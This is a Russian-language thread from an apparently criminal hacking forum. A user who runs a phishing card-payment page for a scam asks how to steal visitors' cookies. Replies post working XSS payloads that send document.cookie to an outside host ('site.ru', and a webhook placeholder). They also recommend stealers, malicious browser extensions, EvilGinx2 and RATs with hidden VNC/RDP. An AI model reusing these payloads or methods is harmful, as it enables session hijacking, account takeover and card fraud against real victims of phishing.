• XSS.stack #1 – первый литературный журнал от юзеров форума

Как стырить все куки(cookies)?

devilwithmoney

HDD-drive
Пользователь
Регистрация
05.12.2021
Сообщения
27
Реакции
4
Всем привет!
Сразу оговорюсь, что еще новичок в веб-разработке на php, если мой вопрос покажется кому-то совсем азбучным.
Но вопрос вот в чем - я создал фиш-страницу с формой заполнения лог:пасс - какой скрипт мне нужно прописать чтобы все куки пользователя, перешедшего по моему линку, я смог у себя сохранить?
Заранее всем спасибо, кто не прошел мимо и конструктивно подсказал🤝
 
какой скрипт мне нужно прописать чтобы все куки пользователя, перешедшего по моему линку, я смог у себя сохранить?
никакой, это невозможно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
чтобы все куки пользователя
все кукис нет, никогда. от уязвимого сайта к xss еще возможно, но только от того сайта на который ты загрузил уязвимый скрипт
с другой стороны, может стоит рассмотреть другие варианты, например стиллеры, или расширения для браузеров, если конечно ты целишься в конкретного человека
 
никакой, это невозможно
Да не, все можно, вопрос - как это сделать грамотнее, вот старый пример xss-атаки:
<script>
var img = new Image( );
img .src = 'http://site.ru/img.jpg?id=' + document.cookie
</script>

Ну вот - такой скрипт создает картинку, у этой картинки путь, который гет-параметром отправит твои куки по ссылки на другой домен, для примера я взял "site.ru"
 
все кукис нет, никогда. от уязвимого сайта к xss еще возможно, но только от того сайта на который ты загрузил уязвимый скрипт
с другой стороны, может стоит рассмотреть другие варианты, например стиллеры, или расширения для браузеров, если конечно ты целишься в конкретного человека

Да заказчик один был - сделал фиш страницу оплаты с карты + 3дс чтобы сразу стучало в тг, ну для скам-проекта. Так вот спросили можно ли еще куки стырить у мамонта когда он переходит на мою фиш-страницу. Так вот задумался над возможностью такой реализации
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Так вот спросили можно ли еще куки стырить у мамонта когда он переходит на мою фиш-страницу
Тогда что бы тебе было легче самостоятельно прийти к мысли, что данное действие невозможно, давай подумаем. Кукис хранятся на стороне браузера. Единственный код который выполняется на стороне браузера - будет яваскрипт. Твой код админки может получить доступ к кукам, доступ к которым разрешил браузер, а браузер разрешает доступ только к тем кукам от сайтов, из под которых выполняется js. Для того что бы обойти данное ограничение, придется найти уязвимость в движке браузера, раскрутить ее, и начать зарабатывать тысячи долларов.
 
Да не, все можно, вопрос - как это сделать
Тебе следует крепко подумать над тем что написала Лолошка... Вкуси запретный плод и просветет теба дух святой.
все кукис нет, никогда. от уязвимого сайта к xss еще возможно, но только от того сайта на который ты загрузил уязвимый скрипт
 
Ну это только если найдёшь уязвимость браузера. Было бы сильно просто, заманил людей на свой сайт каким-то порно баннером, и вот у тебя куки от палки, бинанса, ба :)
 
Эй парень, почитай про EvilGinx2
Всем привет!
Сразу оговорюсь, что еще новичок в веб-разработке на php, если мой вопрос покажется кому-то совсем азбучным.
Но вопрос вот в чем - я создал фиш-страницу с формой заполнения лог:пасс - какой скрипт мне нужно прописать чтобы все куки пользователя, перешедшего по моему линку, я смог у себя сохранить?
Заранее всем спасибо, кто не прошел мимо и конструктивно подсказал🤝
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Hi all!
I’ll make a reservation right away that I’m still new to web development in php, if my question seems quite elementary to someone.
But the question is - I created a fish page with a log:pass form - what script do I need to write so that I can save all the cookies of the user who clicked on my link?
Thanks in advance to everyone who stopped by and gave constructive advice.

Use rat capable of hrdp or hvnc
 
В качестве реквестора подойдет:
В качестве payload:
Код:
<script>document.write('<img src="https://WEBHOOKLINK?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>
Подставляешь вместо *WEBHOOKLIK* ссылку на payload для реквестора и получаешь session-cookie в зависимости какой это тип xss, reflected или stored.
Причем webhook.site после того как ты закрыл браузер все ровно ждет пока кто то перейдет и при-следующем заходе все-ровно показывает что и куда приходило:
Пример:
Screenshot_20230712_224250.png
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх